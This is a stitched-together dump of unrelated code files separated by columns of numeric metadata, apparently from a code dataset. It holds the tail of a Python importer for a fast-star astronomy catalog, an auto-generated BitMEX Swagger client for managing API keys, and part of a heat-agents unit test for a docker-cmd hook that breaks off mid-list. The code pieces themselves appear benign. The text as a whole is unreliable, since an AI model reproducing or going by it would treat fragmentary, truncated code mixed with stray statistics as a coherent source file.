'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=sourcegaia)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=sourcegaia)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['HRV']), e_value=str(row['e_HRV']), source=source)
#catalog.entries[name].add_quantity(
# FASTSTARS.LUM_DIST, str(float(str(row['d']))/1e3), e_lower_value=str(float(str(row['e_low_d']))/1e3), e_upper_value=str(float(str(row['e_upp_d']))/1e3), u_value='kpc', source=source)
if str(row['dspec'])!='--':
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(float(str(row['dspec']))/1e3), e_value=str(float(str(row['e_dspec']))/1e3), u_value='kpc', source=source)
sptype = str(row['SpectralType'])
if sptype != '--':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, sptype, source=source)
stellarclass = str(row['StellarClass']).split('/')
if str(row['StellarClass'])!='--':
for SC in stellarclass:
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, SC, source=source)
# 2018arXiv180410607M
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'marchetti2018.txt')
data = read(datafile)
for row in pbar(data, task_str):
oname = 'Gaia DR2 '+str(row['source_id']).strip()[:6]
name, source = catalog.new_entry(oname, bibcode='2018arXiv180410607M')
lname = 'Gaia DR2 '+str(row['source_id']).strip()
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lname, source=source)
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'T. Marchetti, E. M. Rossi, A. G. A. Brown', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
#sourcegaia = catalog.entries[name].add_source(bibcode='2016A&A...595A...2G')
ra, dec = coord(ra=float(row['ra'])*u.deg,dec=float(row['dec'])*u.deg,frame='icrs').to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
# 2018arXiv180503194H
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','hattori2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['ID']).strip(' ')
name, source = catalog.new_entry(oname, bibcode='2018arXiv180503194H')
lgname = 'Gaia DR2 '+str(row['GaiaDR2']).strip(' ')
sgname = 'Gaia DR2 '+str(row['GaiaDR2']).strip(' ')[:6]
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=source)
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, sgname, source=source)
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Kohei Hattori, Monica Valluri, Eric F. Bell, Ian U. Roederer', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
# 2018arXiv180608630I
### Has teff, mass, logg, radii, etc.
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','irrgang2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['id'])
name, source = catalog.new_entry(oname, bibcode='2018arXiv180608630I')
alias = str(row['catalog'])
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, alias, source=source)
catalog.entries[name].add_quantity(FASTSTARS.VELOCITY, str(row['vrad']), e_lower_value=str(row['e_vrad_low']/2.576), e_upper_value=str(row['e_vrad_upp']/2.576), source=source, u_value='km/s')
catalog.entries[name].add_quantity(FASTSTARS.LUM_DIST, str(row['dist']), e_lower_value=str(row['e_dist_low_1sig']), e_upper_value=str(row['e_dist_upp_1sig']), source=source, u_value='kpc')
# 2017MNRAS.466.3077M
### Has teff, logg, some abundances
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','bidin2016.csv')
data = read(datafile)
for row in pbar(data, task_str):
# disable this when LMC potential is in.
if str(row['shortid']) in ['390','403']:
oname = 'MoniBidin'+str(row['shortid'])
name, source = catalog.new_entry(oname, bibcode='2017MNRAS.466.3077M')
sourcedinescu = catalog.entries[name].add_source(bibcode='2018arXiv180702028C')
lgname = 'Gaia DR2 '+str(row['gaiadr2']).strip(' ')
sgname = 'Gaia DR2 '+str(row['gaiadr2']).strip(' ')[:6]
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=sourcedinescu)
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, sgname, source=sourcedinescu)
catalog.entries[name].add_quantity(FASTSTARS.VELOCITY, str(row['rv']), e_value=str(row['rv_error']), source=source, u_value='km/s')
catalog.entries[name].add_quantity(FASTSTARS.LUM_DIST, str(row['dist']), e_lower_value=str(row['dist_error_low']), e_upper_value=str(row['dist_error_high']), source=source, u_value='kpc')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'C. Moni Bidin, D. I. Casetti-Dinescu, T. M. Girard, L. Zhang, R. A. Méndez, K. Vieira, V. I. Korchagin, W. F. van Altena', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
# 2018arXiv180700427D
### Has teff, logg, some abundances
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','du2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['name'])
name, source = catalog.new_entry(oname, bibcode='2018arXiv180700427D')
lgname = 'Gaia DR1 '+str(row['source_id']).strip(' ')
sgname = 'Gaia DR1 '+str(row['source_id']).strip(' ')[:6]
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=source)
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, sgname, source=source)
catalog.entries[name].add_quantity(FASTSTARS.VELOCITY, str(row['hrv']), e_value=str(row['hrv_error']), source=source, u_value='km/s')
catalog.entries[name].add_quantity(FASTSTARS.LUM_DIST, str(float(row['dhel'])/1e3), e_value=str(float(row['dhel_error'])/1e3), source=source, u_value='kpc')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Cuihua Du, Hefan Li, Shuai Liu, Thomas Donlon, Heidi Jo Newberg', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2018), source)
# 2018arXiv180802620B
### Has teff, mass, logg, radii, etc.
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII','bromley2018.csv')
data = read(datafile)
for row in pbar(data, task_str):
oname = str(row['GaiaDR2ID'])
lgname = 'Gaia DR2 '+str(row['GaiaDR2ID'])
sgname = 'Gaia DR2 '+str(row['GaiaDR2ID'])[:6]
print(lgname)
name, source = catalog.new_entry(sgname, bibcode='2018arXiv180802620B')
catalog.entries[name].add_quantity(FASTSTARS.ALIAS, lgname, source=source)
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Benjamin C. Bromley, Scott J. Kenyon, Warren R. Brown, Margaret J. Geller', source)
catalog.journal_entries()
return
| 57.247853
| 387
| 0.617978
| 5,832
| 46,657
| 4.8143
| 0.093107
| 0.124159
| 0.159632
| 0.168287
| 0.85465
| 0.842683
| 0.830502
| 0.813655
| 0.794066
| 0.781244
| 0
| 0.030541
| 0.226633
| 46,657
| 814
| 388
| 57.318182
| 0.747582
| 0
| 0
| 0.71409
| 0
| 0.01368
| 0.112716
| 0.004392
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.019152
| null | null | 0.001368
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7174ce966488a21416aa94ca3b68ed4cdecbf15f
| 22,756
|
py
|
Python
|
bitmex_swagger/api/api_key_api.py
|
silencewwt/bitmex-swagger-client
|
01403685eeb12eb27d53a0310d3bc7541793aa0f
|
[
"MIT"
] | 1
|
2018-08-04T15:05:43.000Z
|
2018-08-04T15:05:43.000Z
|
bitmex_swagger/api/api_key_api.py
|
silencewwt/bitmex-swagger
|
01403685eeb12eb27d53a0310d3bc7541793aa0f
|
[
"MIT"
] | null | null | null |
bitmex_swagger/api/api_key_api.py
|
silencewwt/bitmex-swagger
|
01403685eeb12eb27d53a0310d3bc7541793aa0f
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
BitMEX API
## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) ---- #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ---- ## All API Endpoints Click to expand a section. # noqa: E501
OpenAPI spec version: 1.2.0
Contact: support@bitmex.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bitmex_swagger.api_client import ApiClient
class APIKeyApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def a_pi_key_disable(self, api_key_id, **kwargs): # noqa: E501
"""Disable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_disable(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_disable_with_http_info(api_key_id, **kwargs) # noqa: E501
else:
(data) = self.a_pi_key_disable_with_http_info(api_key_id, **kwargs) # noqa: E501
return data
def a_pi_key_disable_with_http_info(self, api_key_id, **kwargs): # noqa: E501
"""Disable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_disable_with_http_info(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_disable" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `a_pi_key_disable`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'api_key_id' in params:
form_params.append(('apiKeyID', params['api_key_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey/disable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APIKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_enable(self, api_key_id, **kwargs): # noqa: E501
"""Enable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_enable(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_enable_with_http_info(api_key_id, **kwargs) # noqa: E501
else:
(data) = self.a_pi_key_enable_with_http_info(api_key_id, **kwargs) # noqa: E501
return data
def a_pi_key_enable_with_http_info(self, api_key_id, **kwargs): # noqa: E501
"""Enable an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_enable_with_http_info(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_enable" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `a_pi_key_enable`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'api_key_id' in params:
form_params.append(('apiKeyID', params['api_key_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey/enable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APIKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_get(self, **kwargs): # noqa: E501
"""Get your API Keys. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_get(async=True)
>>> result = thread.get()
:param async bool
:param bool reverse: If true, will sort results newest first.
:return: list[APIKey]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.a_pi_key_get_with_http_info(**kwargs) # noqa: E501
return data
def a_pi_key_get_with_http_info(self, **kwargs): # noqa: E501
"""Get your API Keys. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_get_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param bool reverse: If true, will sort results newest first.
:return: list[APIKey]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reverse'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'reverse' in params:
query_params.append(('reverse', params['reverse'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[APIKey]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_new(self, **kwargs): # noqa: E501
"""Create a new API Key. # noqa: E501
API Keys can only be created via the frontend. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_new(async=True)
>>> result = thread.get()
:param async bool
:param str name: Key name. This name is for reference only.
:param str cidr: CIDR block to restrict this key to. To restrict to a single address, append \"/32\", e.g. 207.39.29.22/32. Leave blank or set to 0.0.0.0/0 to allow all IPs. Only one block may be set. <a href=\"http://software77.net/cidr-101.html\">More on CIDR blocks</a>
:param str permissions: Key Permissions. All keys can read margin and position data. Additional permissions must be added. Available: [\"order\", \"orderCancel\", \"withdraw\"].
:param bool enabled: Set to true to enable this key on creation. Otherwise, it must be explicitly enabled via /apiKey/enable.
:param str token: OTP Token (YubiKey, Google Authenticator)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_new_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.a_pi_key_new_with_http_info(**kwargs) # noqa: E501
return data
def a_pi_key_new_with_http_info(self, **kwargs): # noqa: E501
"""Create a new API Key. # noqa: E501
API Keys can only be created via the frontend. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_new_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str name: Key name. This name is for reference only.
:param str cidr: CIDR block to restrict this key to. To restrict to a single address, append \"/32\", e.g. 207.39.29.22/32. Leave blank or set to 0.0.0.0/0 to allow all IPs. Only one block may be set. <a href=\"http://software77.net/cidr-101.html\">More on CIDR blocks</a>
:param str permissions: Key Permissions. All keys can read margin and position data. Additional permissions must be added. Available: [\"order\", \"orderCancel\", \"withdraw\"].
:param bool enabled: Set to true to enable this key on creation. Otherwise, it must be explicitly enabled via /apiKey/enable.
:param str token: OTP Token (YubiKey, Google Authenticator)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'cidr', 'permissions', 'enabled', 'token'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_new" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'name' in params:
form_params.append(('name', params['name'])) # noqa: E501
if 'cidr' in params:
form_params.append(('cidr', params['cidr'])) # noqa: E501
if 'permissions' in params:
form_params.append(('permissions', params['permissions'])) # noqa: E501
if 'enabled' in params:
form_params.append(('enabled', params['enabled'])) # noqa: E501
if 'token' in params:
form_params.append(('token', params['token'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APIKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_remove(self, api_key_id, **kwargs): # noqa: E501
"""Remove an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_remove(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_remove_with_http_info(api_key_id, **kwargs) # noqa: E501
else:
(data) = self.a_pi_key_remove_with_http_info(api_key_id, **kwargs) # noqa: E501
return data
def a_pi_key_remove_with_http_info(self, api_key_id, **kwargs): # noqa: E501
"""Remove an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_remove_with_http_info(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_remove" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `a_pi_key_remove`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'api_key_id' in params:
form_params.append(('apiKeyID', params['api_key_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.935849
| 1,509
| 0.616189
| 2,809
| 22,756
| 4.767533
| 0.11036
| 0.044803
| 0.030466
| 0.026882
| 0.861634
| 0.850134
| 0.850134
| 0.838187
| 0.838187
| 0.838187
| 0
| 0.01788
| 0.282343
| 22,756
| 529
| 1,510
| 43.017013
| 0.802094
| 0.05515
| 0
| 0.775801
| 0
| 0
| 0.201556
| 0.046596
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014235
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
71854dc003b132bf3eac615039953bb47cf27bf4
| 30,103
|
py
|
Python
|
tests/test_hook_docker_cmd.py
|
mail2nsrajesh/heat-agents
|
cb2690a5fc39b8422f436b79da0b0210da082ec4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_hook_docker_cmd.py
|
mail2nsrajesh/heat-agents
|
cb2690a5fc39b8422f436b79da0b0210da082ec4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_hook_docker_cmd.py
|
mail2nsrajesh/heat-agents
|
cb2690a5fc39b8422f436b79da0b0210da082ec4
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
import os
import tempfile
import fixtures
from tests import common
class HookDockerCmdTest(common.RunScriptTest):
data = {
"name": "abcdef001",
"group": "docker-cmd",
"id": "abc123",
"inputs": [{
"name": "deploy_stack_id",
"value": "the_stack",
}, {
"name": "deploy_resource_name",
"value": "the_deployment",
}],
"config": {
"db": {
"name": "x",
"image": "xxx",
"privileged": False,
"environment": ["foo=bar"],
"env_file": "env.file",
"start_order": 0
},
"web-ls": {
"action": "exec",
"start_order": 2,
"command": ["web", "/bin/ls", "-l"]
},
"web": {
"name": "y",
"start_order": 1,
"image": "yyy",
"net": "host",
"restart": "always",
"privileged": True,
"user": "root",
"command": "/bin/webserver start",
"volumes": [
"/run:/run",
"db:/var/lib/db"
],
"environment": [
"KOLLA_CONFIG_STRATEGY=COPY_ALWAYS",
"FOO=BAR"
],
"env_file": [
"foo.env",
"bar.conf"
]
}
}
}
data_exit_code = {
"name": "abcdef001",
"group": "docker-cmd",
"id": "abc123",
"config": {
"web-ls": {
"action": "exec",
"command": ["web", "/bin/ls", "-l"],
"exit_codes": [0, 1]
}
}
}
def setUp(self):
super(HookDockerCmdTest, self).setUp()
self.hook_path = self.relative_path(
__file__,
'..',
'heat-config-docker-cmd/install.d/hook-docker-cmd.py')
self.cleanup_path = self.relative_path(
__file__,
'..',
'heat-config-docker-cmd/',
'os-refresh-config/configure.d/50-heat-config-docker-cmd')
self.fake_tool_path = self.relative_path(
__file__,
'config-tool-fake.py')
self.working_dir = self.useFixture(fixtures.TempDir())
self.outputs_dir = self.useFixture(fixtures.TempDir())
self.test_state_path = self.outputs_dir.join('test_state.json')
self.env = os.environ.copy()
self.env.update({
'HEAT_DOCKER_CMD': self.fake_tool_path,
'TEST_STATE_PATH': self.test_state_path,
})
def assert_args_and_labels(self, expected_args, expected_labels, observed):
'''Assert the labels arguments separately to other arguments.
Tests that each expected_labels label exists, and remaining
expected arguments match exactly.
This allows paunch to add new label arguments without breaking these
tests.
'''
args = []
labels = []
j = 0
while j < len(observed):
if observed[j] == '--label':
j += 1
labels.append(observed[j])
else:
args.append(observed[j])
j += 1
self.assertEqual(expected_args, args)
for label in expected_labels:
self.assertIn(label, labels)
def test_hook(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing
{},
# ps for renames
{},
# ps for currently running containers
{},
# inspect for db unique container name
{},
# docker run db
{'stderr': 'Creating db...'},
# inspect for web unique container name
{},
# docker run web
{'stderr': 'Creating web...'},
# name lookup for exec web
{'stdout': 'web'},
# docker exec web
{'stderr': 'one.txt\ntwo.txt\nthree.txt'},
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data))
self.assertEqual(0, returncode, stderr)
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Creating db...\n'
'Creating web...\n'
'one.txt\ntwo.txt\nthree.txt',
'deploy_status_code': 0
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 9))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'db'
], state[3]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'db',
'--detach=true',
'--env-file=env.file',
'--env=foo=bar',
'--privileged=false',
'xxx'
''
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=db',
'managed_by=docker-cmd',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'web',
], state[5]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'web',
'--detach=true',
'--env-file=foo.env',
'--env-file=bar.conf',
'--env=KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'--env=FOO=BAR',
'--net=host',
'--privileged=true',
'--restart=always',
'--user=root',
'--volume=/run:/run',
'--volume=db:/var/lib/db',
'yyy',
'/bin/webserver',
'start'
], [
